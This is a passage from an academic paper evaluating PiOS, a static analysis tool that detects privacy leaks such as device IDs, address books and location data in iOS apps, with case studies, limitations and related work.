As part of the static analysis process, PiOS attempts to
resolve all calls to the objc_msgSend dispatch function.
More precisely, for each call to objc_msgSend, the sys-
tem reasons about the target method (and class) that would
be invoked during runtime (described in Section 4.2) by the
dispatch routine. This is necessary to build the programs
control ow graph.
During the course of evaluating PiOS on 1,407 applica-
tions, we identied 4,156,612 calls to the message dispatch
function. PiOS was able to identify the corresponding class
and method for 3,408,421 call sites (82%). Note that PiOS
reports success only if the inferred class exists in the class
hierarchy, and the selector denotes a method that is imple-
mented by the class, or its ancestors in the hierarchy. These
results indicate that a signicant portion of the CFGs can be
successful reconstructed, despite the binary analysis chal-
lenges.
6.2 Advertisement and Tracking Libraries
PiOS resolves all calls to the objc_msgSend function
regardless of whether the target method in the binary was
written by the application developer herself, or whether it is
part of a third-party library that was statically linked against
the application. In an early stage of our experiments, we re-
alized that many applications contained one (or even multi-
ple instances) of a few popular libraries. Moreover, all these
libraries triggered PiOS privacy leak detection because the
system detected paths over which the unique device ID was
transmitted to third parties.
A closer examination revealed that most of these li-
braries are used to display advertisement to users. As many
iOS applications include advertisements to create a stream
of revenue for the developer, their popularity was not sur-
prising. However, the fact that all these libraries also leak
the device IDs of users that install their applications was
less expected. Moreover, we also found tracking libraries,
whose sole purpose is to collect and compile statistics on
application users and usage. Clearly, these libraries send
the device ID as a part of their functionality.
Applications that leak device IDs are indeed pervasive,
and we found that 656 (or 55% of all applications) in our
evaluation data set include either advertisement or tracking
libraries. Some applications even include multiple differ-
ent libraries at once. In fact, these libraries were so frequent
that we decided to white-list them; in the sense that it was of
no use for PiOS to constantly re-analyze and reconrm their
data ows. More precisely, whenever a path starts from a
sensitive sink in a white-listed library, further analysis is
skipped for this path. Thus, the analysis results that we re-
port in the subsequent sections only cover the code that was
actually written by application developers. For complete-
ness, Table 2 shows how frequently our white-list triggered
for different applications.
Library Type #apps #white-
Name using listed
AdMob Advertising 538 55,477
Pinchmedia Statistics/Tracking 79 2,038
Flurry Statistics/Tracking 51 386
Mobclix Advertising 49 1,445
AdWhirl Advertising 14 319
QWAdView Advertising 14 219
OMApp Statistics/Tracking 10 658
ArRoller Advertising 8 734
AdRollo Advertising 7 127
MMadView Advertising 2 96
Total 772 61,499
Table 2. Prevalence of advertising and track-
ing libraries.
While not directly written by an application developer,
libraries that leak device IDs still pose a privacy risk to
users. This is because the company that is running the ad-
vertisement or statistics service has the possibility to aggre-
gate detailed application usage proles. In particular, for
a popular library, the advertiser could learn precisely which
subset of applications (that include this library) are installed
on which devices. For example, in our evaluation data set,
AdMob is the most-widely-used library to serve advertise-
ments. That is, 82% of the applications that rely on third-
party advertising libraries include AdMob. Since each re-
quest to the third-party server includes the unique device ID
and the application ID, AdMob can easily aggregate which
applications are used on any given device.
Obviously, the device ID cannot immediately be linked
to a particular user. However, there is always the risk that
such a connection can be made by leveraging additional in-
formation. For example, AdMob was recently acquired by
Google. Hence, if a user happens to have an active Google
account and uses her device to access Googles services
(e.g., by using GMail), it now becomes possible for Google
to tie this user account to a mobile phone device. As a re-
sult, the information collected through the ad service can be
used to obtain a detailed overview of who is using which
applications. Similar considerations apply to many other
services (such as social networks like Facebook) that have
the potential to link a device ID to a user prole (assuming
the user has installed the social networking application).
The aforementioned privacy risk could be mitigated by
Apple if an identier would be used that is unique for the
combination of application and device. That is, the device
ID returned to a program should be different for each appli-
cation.
6.3 Reachability Analysis
Excluding white-listed accesses to sensitive data, PiOS
checked the CFGs of the analyzed applications for the pres-
ence of paths that connect sensitive sources to sinks. This
analysis resulted in a set of 205 applications that contain at
least one path from a source to a sink, and hence, a poten-
tial privacy leak. Interestingly, 96 of the 656 applications
that triggered the white-list also contain paths in their core
application code (i.e., outside of ad or tracking libraries).
The overwhelming majority (i.e., 3,877) of the accessed
sources corresponds to the unique device identier. These
accesses originate from 195 distinct applications. 36 appli-
cations access the GPS location data at 104 different pro-
gram locations. Furthermore, PiOS identied 18 paths in 5
applications that start with an access to the address book.
One application accesses both the MobileSafari history and
the photo storage. An overview that summarizes the poten-
tial leaks is shown Table 3.
Source # App Store # Cydia Total
DeviceID 170 (21%) 25 (4%) 195 (14%)
Location 35 (4%) 1 (0.2%) 36 (3%)
Address book 4 (0.5%) 1 (0.2%) 5 (0.4%)
Phone number 1 (0.1%) 0 (0%) 1 (0.1%)
Safari history 0 (0%) 1 (0.2%) 1 (0.1%)
Photos 0 (0%) 1 (0.2%) 1 (0.1%)
Table 3. Applications accessing sensitive
data.
An interesting conclusion that one can draw from look-
ing at Table 3 is that, overall, the programs on Cydia are
not more aggressive (malicious) than the applications on the
App Store. This is somewhat surprising, since Cydia does
not implement any vetting process.
6.4 Data Flow Analysis
For the 205 applications that were identied with possi-
ble information leaks, PiOS then performed additional anal-
ysis to attempt to conrm whether sensitive information is
actually leaked. More precisely, the system enumerates all
paths in the CFG between a pair of source and sink nodes
whose length does not exceed 100 basic blocks. Data ow
analysis is then performed on these paths until either a ow
indicates that sensitive information is indeed transmitted
over the network, or all paths have been analyzed (with-
out result). Note that our analysis is not sound; that is, we
might miss data ows due to code constructs that we can-
not resolve statically. However, the analysis is precise, and
every conrmed ow is indeed a privacy leak. This is use-
ful when the majority of paths actually correspond to leaks,
which we found to be true.
For 172 applications, the data ow analysis conrmed a
ow of sensitive information to a sink. We manually ana-
lyzed the remaining 33 applications to asses whether there
really is no data ow, or whether we encountered a false
negative. In six applications, even after extensive, manual
reverse engineering, we could not nd an actual ow. In
these cases, our data ow analysis produced the correct re-
sult. The remaining 27 cases were missed due to a variety
of program constructs that are hard to analyze statically (re-
call that we operate directly on binary code). We discuss a
few of the common problems below.
For six applications, the data ow analysis was unsuc-
cessful because these applications make use of custom-
written functions to store data in aggregate types. Also,
PiOS does not support nested data structures such as dic-
tionaries stored inside dictionaries.
In four cases, the initial step could not resolve all the
necessary object types. For example, PiOS was only able
to resolve that the invoked method (the sent message) was
setValue:forHTTPHeader- Field. However, the
object on which the method was called could not be de-
termined. As a result, the analysis could not proceed.
Two applications made use of a JSON library that
adds categories to many data types. For example, the
NSDictionary class is extended with a method that re-
turns the contents of this dictionary as a JSON string. To
this end, the method sends each object within the dictionary
a JSONRepresentation message. The ows of sensi-
tive information were missed because PiOS does not keep
track of the object types stored within aggregate data types
(e.g., dictionaries).
In other cases, ows were missed due to aliased pointers
(two different pointers that refer to the same object), leaks
that only occur in the applications exception handler (which
PiOS does not support), or a format string that was read
from a conguration le.
6.5 Case Studies
When examining the results of our analysis (in Table 3),
we can see that most leaks are due to applications that trans-
mit the device ID. This is similar to the situation of the ad-
vertising and tracking libraries discussed previously. More-
over, a number of applications transmit the users location
to a third party. These cases, however, cannot be considered
real privacy leaks. The reason is that iOS itself warns users
(and asks for permission) whenever an application makes
use of the CoreLocation functionality. Unfortunately,
such warnings are not provided when other sensitive data is
accessed. In the following, we discuss in more detail the
few cases in which the address book, the browser history,
and the photo gallery is leaked.
Address book leaks. PiOS indicated a ow of sensitive
information for the Gowalla social networking application.
Closer examination of the offending path showed that the
application rst accesses the address book and then uses
the loadRequest method of the UIWebView class to
launch a web request. As part of this request, the applica-
tion transmits all user names and their corresponding email
addresses.
We then attempted to manually conrm the privacy
leak by installing Gowalla on a iOS device and monitor-
ing the network trafc. The names of the methods in-
volved in the leak, emailsAndNamesQueryString
and emailsAndNamesFromAddressBook, both in the
InviterView- Controller class, made it easy to nd
the corresponding actions on the user interface. In particu-
lar, the aforementioned class is responsible for inviting a
users friends to also download and use the Gowalla appli-
cation. A user can choose to send invitations to her Twit-
ter followers, Facebook friends, or simply select a group of
users from the address book. This is certainly legitimate be-
havior. However, the application also, and before the user
makes any selection, transmits the address book in its en-
tirety to the developer. This is the ow that PiOS detects.
The resulting message
4
indicates that the developers are us-
ing this information to crosscheck with their user database
whether any of the users contacts already use the applica-
tion. When we discovered this privacy breach, we informed
Apple through the Report a problem link associated with
this application on iTunes. Despite our detailed report, Ap-
ples response indicated that we should discuss our privacy
concerns directly with the developer.
PiOS found another leak of address book data in twit-
tericki. This application checks all contacts in the address
book to determine whether there is a picture associated with
the person. If not, the application attempts to obtain a pic-
ture of this person from Facebook. While information from
the address book is used to create network requests, these
requests are sent to Facebook. It is not the application de-
velopers that attempt to harvest address book data.
In other three cases, the address book is also sent with-
out displaying a direct warning to the user before the sen-
sitive data is transferred. However, these applications ei-
ther clearly inform the user about their activity at the be-
ginning (Facebook) or require the user to actively initiate
the transfer by selecting contacts from the address book
(XibGameEngine, to invite friend; FastAddContacts to pop-
ulate the send-to eld when opening a mail editor). This
shows that not all leaks have the same impact on a users
4
We couldnt nd any friends from your Address Book who use
Gowalla. Why dont you invite some below?
privacy, although in all cases, PiOS correctly recognized a
sensitive data ow.
Browser history and photo gallery. Mobile-Spy offers
an application called smartphone on the Cydia market
place. This application is advertised as a surveillance so-
lution to monitor children or employees. Running only on
jailbroken devices, the software has direct access to SMS
messages, emails, GPS coordinates, browser history, and
call information. The application is designed as a daemon
process running in the background, where it collects all
available information and transmits it to Mobile-Spys site.
The user who installs this application can then go to the site
and check the collected data.
PiOS was able to detect two ows of sensitive informa-
tion in this application. The upload of the MobileSafari his-
tory, and the upload of the Photo gallery. However, PiOS
was not able to identify the leaking of the address book, and
the transfer of the email box, or SMS messages. The rea-
son for all three cases is that the application calls system
with a cp command to make a local copy of the local phone
databases that hold this information. These copies are later
opened, and their content is transferred to the Mobile-Spy
service. Tracking through the invocation of the system li-
brary call would require PiOS to understand the semantics
of the passed (shell) commands. Clearly, this is outside of
the scope of this paper.
Phone Number. In November 2009, Apple re-
moved all applications developed by Storm8 due to
privacy concerns. More precisely, these applica-
tions were found to access the users phone number
via the SBFormattedPhoneNumber key in the
standardUserDefaults properties. Once retrieved,
the phone number was then transmitted to Storm8s servers.
Shortly after the ban of all their applications, Storm8
developers released revised versions that did not contain
the offending behavior. This incident prompted Apple to
change their vetting process, and now, all applications that
access this key are rejected. Thus, to validate PiOS against
this known malicious behavior, we obtained a version of
Vampires Live (a Storm8 application) that predates this
incident, and hence, contains the offending code. PiOS
correctly and precisely identied that the phone number is
read on program startup and then sent to Storm8.
6.6 Discussion
With the exception of a few bad apples, we found that
a signicant majority of applications respects the personal
user information stored on iOS devices. While this could
be taken as a sign that Apples vetting process is successful,
we found similar results for the unchecked programs that
are hosted on Cydia, an unofcial repository that can only
be accessed with a jailbroken phone. However, the unique
device ID of the phone is treated differently, and more than
half of the applications leak this information (often because
of advertisement and tracking libraries that are bundled with
the application). While these IDs cannot be directly linked
to a users identity, they allow third parties to prole user
behavior. Moreover, there is always the risk that outside
information can be used to eventually make the connection
between the device ID and a user.
7 Limitations
Statically determining the receiver and selector for ev-
ery call to the objc_msgSend function is not always
possible. Recall that the selector is the name of a
method. Typically, this value is a string value stored in
the __objc_selref section of the application. How-
ever, any string value can be converted to a selector, and
it is possible to write programs that receive string values
whose value cannot be statically determined (e.g., as a re-
sponse to a networking request, or as a conguration value
chosen by the user). This limitation is valid for all static
analysis approaches and not specic to PiOS.
Furthermore, aggregate types in Objective-C (e.g.,
NSArray, NSDictionary, . . . ) are not generic.
That is, the types of objects in such containers can-
not be specied more precisely than id (which is of
type NSObject). For example, the delegate method
touchesEnded:withEvent of the UIResponder
class is called whenever the user nishes a touch interac-
tion with the graphical user interface (e.g., click an element,
swipe an area, . . . ). This method receives as the rst argu-
ment a pointer to an object of type NSSet. Although this
set solely contains UITouch elements, the lack of generic
support in Objective-C prohibits the type information to be
stored with the aggregate instance. Similarly, any object can
be added to an NSArray. Thus, PiOS has to treat any value
that is retrieved from an aggregate as NSObject. Never-
theless, as described in Section 4.2.1, PiOS might still be
able to reason about the type of such an object if a subse-
quent call to the objc_msgSend function uses a selector
that is implemented by exactly one class.
8 Related Work
Clearly, static analysis and program slicing have been
used before. Weiser [19] was the rst to formalize a tech-
nique called program slicing. As outlined in Section 4.2.1,
PiOS makes use of this technique to calculate program
slices that dene receiver and selector values at call-sites
to the objc_msgSend dynamic dispatch function.
Also, static binary analysis was used in the past for vari-
ous purposes. Kruegel et al. [15] made use of static analysis
to perform mimicry attacks on advanced intrusion detection
systems that monitor system call invocations. Christodor-
escu and Jha [6] present a static analyzer for executables
that is geared towards detecting malicious patterns in bina-
ries even if the content is obfuscated. Similarly, the work
described in Christodorescu [7] et al. is also based on bi-
nary static analysis, and identies malicious software using
a semantics-aware malware detection algorithm. However,
some of the obfuscation techniques available on the x86 ar-
chitecture cannot be used on ARM based processors. The
RISC architecture of ARM facilitates more robust disas-
sembly of binaries, as instructions cannot be nested within
other instructions. Furthermore, the strict memory align-
ment prohibits to jump to the middle of ARM instructions.
Thus, disassembling ARM binaries generally produces bet-
ter results than disassembling x86 binaries.
Note that while static binary analysis is already challeng-
ing in any domain, in our work, the analysis is further com-
plicated by the fact that most iOS applications are devel-
oped in Objective-C. It is not trivial to obtain a meaningful
program control ow graph for iOS applications.
In [4], Calder and Grunwald optimize object code of
C++ programs by replacing virtual function calls with di-
rect calls if the program contains exactly one implementa-
tion that matches the signature of the virtual function. This
is possible because the mangled name of a function stored in
an object le, contains information on the class and param-
eter types. PiOS uses a similar technique to resolve the type
of a receiver of a message. However, PiOS only follows this
approach if the type of the receiver cannot be determined by
backwards slicing and constant propagation.
In another work, Dean et al. [9] present an approach that
performs class hierarchy analysis to statically resolve vir-
tual function calls and replace them with direct function
calls. In PiOS, we do not use the class hierarchy to resolve
the invoked method. However, we do use this information to
verify that the results of the backwards slicing and forward
propagation step are consistent with the class hierarchy, and
thus sensible.
PiOS is also related to existing approaches that perform
static data ow analysis. Livshits and Lam [16], for exam-
ple, use static taint analysis for Java byte-code to identify
vulnerabilities that result from incomplete input validation
(e.g., SQL injection, cross site scripting). The main focus of
Tripp et al. [18] is to make static taint analysis scale to large
real-world applications. To this end, the authors introduce
hybrid thin-slicing and combine it with taint analysis to ana-
lyze large web applications, even if they are based on appli-
cation frameworks, such as Struts or Spring. Furthermore,
Pixy [14] performs inter-procedural, context-sensitive data-
ow analysis on PHP web-applications, and also aims to
identify such taint-style vulnerabilities.
There has also been some related work in the domain
of mobile devices: Enck et al. [10] published TaintDroid, a
system that shares a similar goal with this work; namely, the
analysis of privacy leaks in smart phone applications. Dif-
ferent to our system, their work targets Android applications
and performs dynamic information-ow tracking to identify
privacy leaks. Most Android applications are executed by
the open source Dalvik virtual machine. The information-
ow capabilities of TaintDroid were build into a modied
version of this VM. iOS applications, in contrast, are com-
piled into native code and executed by the devices CPU
directly. TaintDroid was evaluated on 30 popular Android
applications. The results agree quite well with our ndings.
In particular, many of the advertising and statistics libraries
that we identied in Section 6.2 also have corresponding
Android versions. As a result, TaintDroid raised alerts when
applications transmitted location data to AdMob, Mobclix,
and Flurry back-end servers.
Furthermore, Enck et al. [11] present an approach named
Kirin where they automatically extract the security manifest
of Android applications. Before an application is installed,
this manifest is evaluated against so-called logic invariants.
The result is that the user is only prompted for her con-
sent to install the application if these invariants are violated.
That is, only applications that violate a users assumption
of privacy and security are prompted for the user agreement
during installation. The concept of a security manifest pro-
vides the user basic information on which she can base her
decision on whether to install an application or not. Unfor-
tunately, the iOS platform does not provide such amenities.
To take a decision, the user can only rely on the verbal de-
scription of the application and Apples application vetting
process.
Another work that focuses on Android is the formal lan-
guage presented by Chaudhuri [5]. Together with opera-
tional semantics and a type system, the author created the
language with the aim of being able to describe Android
applications with regard to security properties. However,
the language currently only supports Android-specic con-
structs. That is, the general Java constructs that build the
majority of an applications code cannot currently be repre-
sented.
To the best of our knowledge, we are the rst to propose
an automated approach to perform an in-depth privacy anal-
ysis of iOS applications.
9 Conclusions
The growing popularity and sophistication of smart-
phones, such as the iPhone or devices based on Android,
have also increased concerns about the privacy of their
users. To address these concerns, smartphone OS design-
ers have been using different security models to protect the
security and privacy of users. For example, Android appli-
cations are shipped with a manifest that shows all required
permissions to the user at installation time. In contrast, Ap-
ple has decided to take the burden off its iPhone users and
determine, on their behalf, if an application conforms to
the predened privacy rules. Unfortunately, Apples vet-
ting process is not public, and there have been cases in the
past (e.g., [20]) where vetted applications have been discov-
ered to be violating the privacy rules dened by Apple.
The goal of the work described in this paper is to auto-
matically analyze iOS applications and to study the threat
they pose to user data. We present a novel approach that
is able to automatically create comprehensive CFGs from
binaries compiled from Objective-C code. We can then per-
form reachability analysis on the generated CFGs and iden-
tify private data leaks. We have analyzed more than 1,400
iPhone applications. Our experiments show that most appli-
cations do not secretly leak any sensitive information that
can be attributed to a person. This is true both for vetted
applications on the App Store and those provided by Cy-
dia. However, a majority of applications leaks the device
ID, which can provide detailed information about the habits
of a user. Moreover, there is always the possibility that addi-
tional data is used to tie a device ID to a person, increasing
the privacy risks.
Acknowledgements
The research leading to these results has received
funding from the European Union Seventh Framework
Programme (FP7/2007-2013) under grant agreement no
257007. This work has also been supported in part by
Secure Business Austria and the European Commission
through project IST-216026-WOMBAT funded under the
7th framework program. This work was also partially sup-
ported by the ONR under grant N000140911042 and by
the National Science Foundation (NSF) under grants CNS-
0845559, CNS-0905537, and CNS-0716095.
References
[1] http://thebigboss.org.
[2] AppTrakr, Complete App Store Ranking. http://
apptrakr.com/.
[3] iPhone Developer Program License Agreement.
http://www.eff.org/files/20100302_
iphone_dev_agr.pdf.
[4] B. Calder and D. Grunwald. Reducing indirect function call
overhead in c++ programs. In POPL 94: Proceedings of
the 21st ACM SIGPLAN-SIGACT symposium on Principles
of programming languages, pages 397408, New York, NY,
USA, 1994. ACM.
[5] A. Chaudhuri. Language-based security on android. In ACM
Workshop on Programming Languages and Analysis for Se-
curity (PLAS), 2009.
[6] M. Christodorescu and S. Jha. Static analysis of executables
to detect malicious patterns. In SSYM03: Proceedings of
the 12th conference on USENIX Security Symposium, pages
1212, Berkeley, CA, USA, 2003. USENIX Association.
[7] M. Christodorescu, S. Jha, S. A. Seshia, D. Song, and R. E.
Bryant. Semantics-aware malware detection. In IEEE Sym-
posium on Security and Privacy (Oakland), 2005.
[8] A. Cohen. The iPhone Jailbreak: A Win Against
Copyright Creep. http://www.time.com/time/
nation/article/0,8599,2006956,00.html.
[9] J. Dean, D. Grove, and C. Chambers. Optimization of
object-oriented programs using static class hierarchy anal-
ysis. In European Conference on Object-Oriented Program-
ming, 1995.
[10] W. Enck, P. Gilbert, B.-G. Chun, L. P. Cox, J. Jung, P. Mc-
Daniel, and A. N. Sheth. TaintDroid: an information-ow
tracking system for realtime privacy monitoring on smart-
phones. In Proceedings of OSDI 2010, October 2010.
[11] W. Enck, M. Ongtang, and P. McDaniel. Understanding an-
droid security. IEEE Security and Privacy, 7(1):5057, 2009.
[12] J. Freeman. http://cydia.saurik.com/.
[13] Gartner Newsroom. Competitive Landscape: Mobile De-
vices, Worldwide, 2Q10. http://www.gartner.com/
it/page.jsp?id=1421013, 2010.
[14] N. Jovanovic, C. Kruegel, and E. Kirda. Pixy: A static anal-
ysis tool for detecting web application vulnerabilities (short
paper). In IEEE Symposium on Security and Privacy, 2006.
[15] C. Kruegel, E. Kirda, D. Mutz, W. Robertson, and G. Vigna.
Automating mimicry attacks using static binary analysis. In
14th USENIX Security Symposium, 2005.
[16] V. B. Livshits and M. S. Lam. Finding security vulnerabili-
ties in java applications with static analysis. In 14th USENIX
Security Symposium, 2005.
[17] N. Seriot. iPhone Privacy. http://www.blackhat.
com/presentations/bh-dc-10/Seriot_
Nicolas/BlackHat-DC-2010-Seriot-iPhone%
2dPrivacy-slides.pdf.
[18] O. Tripp, M. Pistoia, S. J. Fink, M. Sridharan, and O. Weis-
man. Taj: effective taint analysis of web applications. In
ACM Conference on Programming Language Design and
Implementation, 2009.
[19] M. Weiser. Program slicing. In ICSE 81: Proceedings of the
5th international conference on Software engineering, pages
439449, Piscataway, NJ, USA, 1981. IEEE Press.
[20] Wired. Apple Approves, Pulls Flashlight
App with Hidden Tethering Mode. http:
//www.wired.com/gadgetlab/2010/07/
apple-approves-pulls-flashlight%
2dapp-with-hidden-tethering-mode/.

You might also like